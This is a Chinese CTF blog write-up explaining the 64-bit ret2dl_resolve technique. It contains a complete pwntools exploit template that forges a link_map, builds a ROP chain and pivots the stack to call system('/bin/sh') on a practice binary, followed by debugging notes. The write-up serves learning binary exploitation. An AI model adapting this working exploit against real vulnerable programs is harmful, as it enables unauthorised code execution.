64位ret2dl_resolve

最新推荐文章于 2022-10-17 19:55:25 发布
最新推荐文章于 2022-10-17 19:55:25 发布
阅读量733 收藏 3
点赞数 1
分类专栏: ctf 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kr0ne/article/details/109498762
版权

64位ret2dl_resolve一些个人理解

前言

在学32位ret2dl_resolve的时候就遗留了一个坑,64位该怎么搞。因为wiki上整个ELF的部分确实看上去很枯燥而且抓不住重点,就一直留到了现在,最近因为几个比赛题重新研究了一下。

概括

具体思路见参考文章,筛选的都是写的能让我看懂的了。对比模板发现思路都是一样的,这里只分析几个针对不同题目怎么改参数的问题以及坑点。

前置知识

通过阅读_dl_fixup源码可以总结出一般的函数重定向流程可简略如下:

  1. 通过struct link_map *l获得.dynsym、.dynstr、.rel.plt地址
  2. 通过reloc_arg+.rel.plt地址取得函数对应的Elf32_Rel指针,记作reloc
  3. 通过reloc->r_info和.dynsym地址取得函数对应的Elf32_Sym指针,记作sym
  4. 检查r_info最低位是否为7
  5. 检查(sym->st_other)&0x03是否为0
  6. 通过strtab+sym->st_name获得函数对应的字符串,进行查找,找到后赋值给rel_addr,最后调用这个函数。

利用方法:
让sym->st_value等于某个got上已经解析了的函数的那一表项,然后l->l_addr设置为system与这个函数的偏移值,此外,伪造link_map我们还需要伪造:位于link_map+0x70的DT_SYMTAB指针、link_map+0xf8的DT_JMPREL指针,另外strtab必须是个可读的地址,因此我们还需要伪造位于link_map+0x68的DT_STRTAB指针。之后就是伪造.dynamic中的DT_SYMTAB结构体和DT_JMPREL结构体以及函数所对应的Elf64_Rela结构体。为了方便,在构造的过程中一般将reloc_arg作为0来进行构造。

exp

这是我用的exp模板,大部分参数已经给出了注释。

#coding:utf-8
 
from pwn import *
context.log_level = 'debug'
elf = ELF('./pwn222')
libc = elf.libc
p = process('./pwn222')
gdb.attach(p,'b*0x04011AA') # main ret
# libc = ELF('./libc')


'''
typedef struct            
{
    Elf64_Word    st_name;        /* Symbol name (string tbl index) */
      unsigned char    st_info;    /* Symbol type and binding */        
      unsigned char st_other;        /* Symbol visibility */              
      Elf64_Section    st_shndx;    /* Section index */                  
      Elf64_Addr    st_value;        /* Symbol value */                   
      Elf64_Xword    st_size;        /* Symbol size */                    
}Elf64_Sym;
 
typedef struct           
{
  Elf64_Addr    r_offset;        /* Address */                         
  Elf64_Xword    r_info;            /* Relocation type and symbol index */
  Elf64_Sxword    r_addend;        /* Addend */                          
}Elf64_Rela;
 
typedef struct          
{
  Elf64_Sxword    d_tag;            /* Dynamic entry type */
  union
    {
      Elf64_Xword d_val;        /* Integer value */
      Elf64_Addr d_ptr;            /* Address value */
    } d_un;
}Elf64_Dyn;
'''
 
universal_gadget1 = 0x00040122A # gadget_end
universal_gadget2 = 0x000401210 # gadget_front
 
Elf64_Sym_len = 0x18
Elf64_Rela_len = 0x18
write_addr = 0x404040 + 0x440  # write to where
log.info('bss: '+ hex(elf.bss()))

link_map_addr = write_addr+0x18
rbp = write_addr-8
pop_rdi_ret = 0x000401233
leave = 0x004011aa
main = 0x0401146
 
#fake_Elf64_Dyn_STR_addr = l+0x68  
#fake_Elf64_Dyn_SYM_addr = l+0x70  
#fake_Elf64_Dyn_JMPREL_addr = l+0xf8
 
l_addr = libc.sym['system'] - libc.sym['__libc_start_main']
#l->l_addr + sym->st_value
# value = DL_FIXUP_MAKE_VALUE (l, l->l_addr + sym->st_value);
 
def fake_link_map_gen(link_map_addr,l_addr,st_value):
    fake_Elf64_Dyn_JMPREL_addr = link_map_addr + 0x18
    fake_Elf64_Dyn_SYM_addr = link_map_addr + 8
    fake_Elf64_Dyn_STR_addr = link_map_addr
    fake_Elf64_Dyn_JMPREL = p64(0) + p64(link_map_addr+0x28)
    fake_Elf64_Dyn_SYM = p64(0) + p64(st_value-8)
    fake_Elf64_rela = p64(link_map_addr - l_addr) + p64(7) + p64(0)
 
    fake_link_map = p64(l_addr)            #0x8
    fake_link_map += fake_Elf64_Dyn_SYM    #0x10
    fake_link_map += fake_Elf64_Dyn_JMPREL #0x10
    fake_link_map += fake_Elf64_rela       #0x18
    fake_link_map += b'\x00'*0x28
    fake_link_map += p64(fake_Elf64_Dyn_STR_addr) #link_map_addr + 0x68
    fake_link_map += p64(fake_Elf64_Dyn_SYM_addr) #link_map_addr + 0x70
    fake_link_map += b'/bin/sh\x00'.ljust(0x80,b'\x00')
    fake_link_map += p64(fake_Elf64_Dyn_JMPREL_addr)
    return fake_link_map

def get_fake_link_map(fake_link_map_addr,l_addr,st_value):
  # 给出各个指针的假地址
  fake_Elf64_Dyn_STR_addr = p64(fake_link_map_addr)
  fake_Elf64_Dyn_SYM_addr = p64(fake_link_map_addr + 0x8)
  fake_Elf64_Dyn_JMPREL_addr = p64(fake_link_map_addr + 0x18)

  # 伪造相关结构体
  fake_Elf64_Dyn_SYM = flat(p64(0),p64(st_value-8))
  fake_Elf64_Dyn_JMPREL = flat(p64(0),p64(fake_link_map_addr+0x28)  )# JMPREL指向.rel.plt地址,放在fake_link_map_addr+0x28
  r_offset = fake_link_map_addr - l_addr
  log.info("r_offset :"+str(hex(r_offset)))
  fake_Elf64_rela = flat(p64(r_offset),p64(7),p64(0))

  # fake_link_map整体结构
  fake_link_map = flat(   # 0x0
    p64(l_addr),          # 0x8
    fake_Elf64_Dyn_SYM,   # 0x18
    fake_Elf64_Dyn_JMPREL,# 0x28
    fake_Elf64_rela,      # 0x40
    "\x00"*0x28,         # 0x68,下面开始放指针
    fake_Elf64_Dyn_STR_addr,  # STRTAB指针,0x70
    fake_Elf64_Dyn_SYM_addr,  # SYMTAB指针,0x78
    "/bin/sh\x00".ljust(0x80,"\x00"),
    fake_Elf64_Dyn_JMPREL_addr, # JMPREL指针
  )
  return fake_link_map

fake_link_map = fake_link_map_gen(link_map_addr,l_addr,elf.got['__libc_start_main'])
 
payload = b'a'*0x20
payload += p64(rbp)
payload += p64(universal_gadget1)
payload += p64(0)  #pop rbx
payload += p64(1)  #pop rbp
payload += p64(0)  #pop r12
payload += p64(write_addr) #pop r13
payload += p64(len(fake_link_map)+0x18)  #pop r14
payload += p64(elf.got['read'])           #pop r15
payload += p64(universal_gadget2)  #ret
payload += p64(0)*7
payload += p64(main)
payload = payload.ljust(0x200,b'\x00')
p.send(payload)

sleep(1)
 
fake_info = p64(0x00401026)        #jmp plt0+6
fake_info += p64(link_map_addr)
fake_info += p64(0)
fake_info += fake_link_map

p.send(fake_info)
sleep(1)
 
payload = b'b'*0x20+p64(rbp)+p64(pop_rdi_ret)+p64(link_map_addr+0x78)+p64(leave)
#stack pivot,进入函数重定向
payload = payload.ljust(0x200,b'\x00')
p.send(payload)
 
p.interactive()

翻译几个以后我可能看不懂的注释:

  1. universal_gadget指64位通用gadget。
  2. plt0+6就是plt里第一个jmp,指向了got2,符合我们的利用思路。

调试与分析

断点断在了main函数的ret,直接c到这个断点,开始单步到这里。
在这里插入图片描述
这里在参考2最后提到了这个坑点,就是sub后rsp一定要落在可写范围内。可以vmmap一下rsp,如果距离bss还有一点距离,则需要修改exp种的write_addr增加上差值,就可以让rsp落到bss上了。
继续单步到这里:
在这里插入图片描述
可以看到我们即将执行dl_fixup函数。参考1,2都提到了为了方便让reloc
= 0,这里可以证实这一点,我们si进入这个函数。
在这里插入图片描述
走到这儿我们能发现上面的cmp和这里的test,对应到之前分析的

4. 检查r_info最低位是否为7
5. 检查(sym->st_other)&0x03是否为0

第一个check似乎挺容易过的,第二个check在参考1中提到了
在这里插入图片描述
这道题这里我暂时还想不到怎么绕过,因为可用的got函数在libc的位置都在system的后面。通用的libc_start_main被当成全局变量存进来了,在参考1的例题中并没有这问题,如果为了理解还请完全按照参考1食用。这也算是一个新的坑点把。
至于如何应对这个问题,是否是可解决的,暂时留坑了,因为本菜鸡才学到堆,觉得这里已经可以知足了。
问了星盟的一位大师傅,得到了答复“只要找到一个固定的glibc的指针应该就好”。确实这样子就需要动调看能不能让(sym+5)&0x03 != 0 了,通用性也大大降低,不过确实是一种思路。

后记

研究一些自认为超越当前水平的问题挺让人喜悦的,这个思路大概研究了两星期,有亿点感慨,希望以后自己也能保持这种钻研的心。

参考链接

  1. https://bbs.pediy.com/thread-253833.htm
  2. https://zhuanlan.zhihu.com/p/148073987
  3. https://veritas501.space/2017/10/07/ret2dl_resolve%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/
Kr0ne
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
详细解析ret2_dl_runtime_resolve
qq_36495104的博客
05-11 938
先放几个学习的链接 CTF-wiki 高级ROP ret2dl_runtime 之通杀详解 聊聊动态链接和dl_runtime_resolve ELF的学习参考 程序员的自我修养 看了上面的以及一些没有放出来的仍然没有很好地理解这个攻击技巧 延迟绑定 这里直接贴程序员的自我修养书上的内容,延迟绑定看这就够了。 延迟绑定实现 动态链接相关结构 .dynamic段 ELF里专门用于动态链接的段还有几个,首先是.dynamic段。这个段里保存了动态链接器所需的基本信息,比如依赖于哪些共享对象,动态链
ret2dlresolve超详细教程(x86&x64)
qq_51868336的博客
03-10 4855
X86 前置知识 在Linux中,程序使用_dl_runtime_resolve(link_map,reloc_offset)来对动态链接的函数进行重定位。 而ret2dlresolve攻击的核心就是控制相应的参数及其对应地址的内容,从而控制解析的函数。 延迟绑定 第一次调用一个函数时,先是到plt表,然后jmp到got表 此时got表存的地址是在plt表上 其实也就是jmp got的下一条指令,这里先是push一个数字(该函数在rel.plt上的偏移,reloc_arg,后文会讲到),然后jmp到pl
ret2dl_runtime_resolve(64位)
qq_45595732的博客
03-07 508
先把相关结构体和宏都列一下把(也懒得一个一个解释了) typedef struct { Elf64_Sxword d_tag; /* Dynamic entry type */ union { Elf64_Xword d_val; /* Integer value */ Elf64_Addr d_ptr; /* Address value */ } d_un; } Elf64_Dyn; typedef struct { Elf64_Word s
栈溢出之ret2dlresolve
zyxx_wjc的博客
05-07 812
三月份在buuctf上举办的DASCTF上有一道“简单"的栈题——checkin,然而我这个菜鸡拿到题之后直接麻爪了——没有输出咋泄露libc啊(这个Jmp.Cliff他就是逊啦......)......后来学长告诉我,有个技巧叫ret2dlresolve,可以处理这种没有输出的情况,自知基础不牢的我老老实实回到CTF wiki上找到了这个技巧,又参考了网上很多大佬的博客,啃了几天,总算是啃明白了。这两天国赛临近,正积极备赛,突然想到这个有些生疏的知识还未整理,就写个博客记录一下吧。 本文主要围绕64位
好好说话之ret2_dl_runtime_resolve
hollk’s blog
07-21 2752
当初毕业论文就写了一万五千字,没想到一篇ret2_dl_runtime_resolve博客三万两千字~~我吐了~~ 。由于内容比较详细,无法避免有些知识点会忘记,可以通过目录翻阅忘记的内容 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
pwn学习总结(五) —— ret2dl_runtime_resolve(待补充)
qq_41988448的博客
03-23 422
pwn学习总结(十) —— ret2_dl_runtime_resolve一、程序示例二、Section信息.dynamic.dynstr.dymsym.rel.plt延迟绑定 一、程序示例 第一步:编译并运行以下代码 #include<stdio.h> int main() { char buf[]="Hello World!\n"; write(1, buf, strlen...
ret2dl_resolve解析1
08-08
`_dl_runtime_resolve`函数使用`link_map`来访问这些信息,以完成动态链接过程。 在ELF文件中,动态链接器(通常是`ld-linux.so`)负责处理`.rel.plt`表中的条目,将导入函数的地址填入GOT,从而使得程序能够调用...
RAE RET程序.rar_RAE RET程序_RET程序_apartmentbh3_rae ret_电调天线
09-24
2. **通信接口**:为了实现与RET设备的交互,RAE RET程序提供了稳定可靠的通信接口。这通常包括串行通信、以太网通信等,保证数据传输的准确性和实时性。 3. **天线调谐**:程序允许用户对电调天线进行精细调谐,...
ret_17_16.zip_ret软件_波浪能_海浪_海浪高度
09-14
RET软件在海洋能源领域的应用与波浪能分析详解 RET软件,全称为“Wave Energy Resource Assessment Tool”,是一款专为海洋能源研究者和工程师设计的专业工具,尤其在波浪能评估方面表现出色。这款软件的核心功能...
RETAS_HD_PRO.zip
06-29
RETAS是来自日本的二维无纸动画软件,共分为四个模块,TraceMan扫描模块;Stylos原动画模块;Paintman上色模块;以及CoreRETAS合成模块;各有各的分工。如今retas依然成为日本动画制作最为普遍的软件,日本已有100家...
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
ROP高级用法之ret2_dl_runtime_resolve
热门推荐
钞sir的博客
04-29 1万+
简介 程序想要调用其他动态链接库的函数,必须要在程序加载的时候动态链接;在一个程序运行过程中,可能很多函数在程序执行完时都不会用到,比如一些错误处理函数或者一些用户很少用到的功能模块;所以ELF采用一种叫做延迟绑定(Lazy Binding)的做法,基本思想就是当函数第一次被用到的时候才进行绑定(符号查找、重定位等); 而在linux 中是利用_dl_runtime_resolve(link_ma...
高级ret2_dl_runtime_resolve
Jc
07-02 540
Ret2dl 准备: readelf工具的使用 -h 显示文件的头部信息 -l(program headers),segments 显示程序头(段头)信息(如果有数据的话)。 -S(section headers),sections 显示节头信息(如果有数据的话)(区分大小写) -g(section groups),显示节组信息(如果有数据的话) -t,section-details 显示节的...
ret2_dl_runtime_resolve学习
m0_51251108的博客
09-23 320
ret2_dl_runtime_resolve
runtime 分类结构体_64位ret2_dl_runtime_resolve模版题以及踩坑记录
weixin_39646107的博客
01-02 411
什么是ret2dl攻击当程序在第一次加载某个函数的时候,got表中对应的表项还没有写入真实的地址(因为是第一次调用),所以这个时候就需要调用_dl_runtime_resolve函数将真实的地址写入got表对应的表项中,然后将控制权交还这个函数,此时就完成了第一次的调用,got表中也有了对应的真实地址。整个调用过程梳理_dl_fixup之前当我们第一调用read时,他的跳转过程是read@plt ...
ret2dl_runtime_resolve实例分析
Hello World.c
05-07 464
dl_runtime_resolve实例分析 IDA静态分析 这里用2019信安国赛的baby_pwn来做演示(就是因为这个做不出来去做了好多功课),实例程序test在文件夹下,hack.py是实现本地攻击的脚本 首先使用checksec查看文件保护状态,由于是partial relo所以并没机会改写动态段的字符串表地址。所以我们直接伪造所有所需要的参数结构。 ida动态段信息如下 d_ta...
ret2_dl_runtime_resolve高级栈溢出利用思路
a2590035252的博客
10-17 935
推荐给想和我一样深入理解动态链接过程的pwn师傅
ret2dlresolve利用方法
九层台
05-10 2364
使用场景: 一遍运行(延迟绑定技术,只有在第一次调用该函数时才会调用_dll_runtime_resolve函数) 没有输出,没有system函数。 需要: 1.向一个固定地址写入数据(bss段) 2.能够劫持程序执行流 linux下c函数是放在libc库里面的 ldd pwn01 linux-gate.so.1 => (0xf7ef2000) libc.s...
cannot resolve symbol什么意思_Webpack的Bundle Split和Code Split有什么区别?(详解)
weixin_39664774的博客
11-25 377
本篇文章给大家带来的内容是关于Webpack的Bundle Split和Code Split有什么区别?(详解)有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。话说之前也是对 chunk 这个概念有些模糊,并且很多时候网上的文章大部分在将代码分离动态加载之类的。写这篇文章的目的也是想让其他那些跟我一样曾经对这个概念不是很清楚的童鞋有个清晰的认识。废话不多说,撸起袖子直接干!Let's...
__ret_warn_on
最新发布
05-30
`__ret_warn_on()` 是一个 Linux 内核中的宏定义。它用于在函数返回值为一个错误码时打印一条警告信息,提示开发者可能存在一些问题。 该宏的定义如下: ``` #define __ret_warn_on(cond, fmt, ...) \ ({ \ const typeof(cond) __ret_warn_on_val = (cond); \ WARN_ON(__ret_warn_on_val); \ (__ret_warn_on_val ? \ pr_warn(fmt, ##__VA_ARGS__) : \ 0); \ }) ``` 其中,`cond` 表示需要判断的条件,一般为函数的返回值;`fmt` 表示警告信息的格式;`##__VA_ARGS__` 表示可变参数,用于传递具体的警告信息。该宏使用 `WARN_ON()` 宏来判断 `cond` 是否为真,如果为真则打印警告信息。 使用 `__ret_warn_on()` 宏可以帮助开发者及时发现问题,提高代码的健壮性和可维护性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值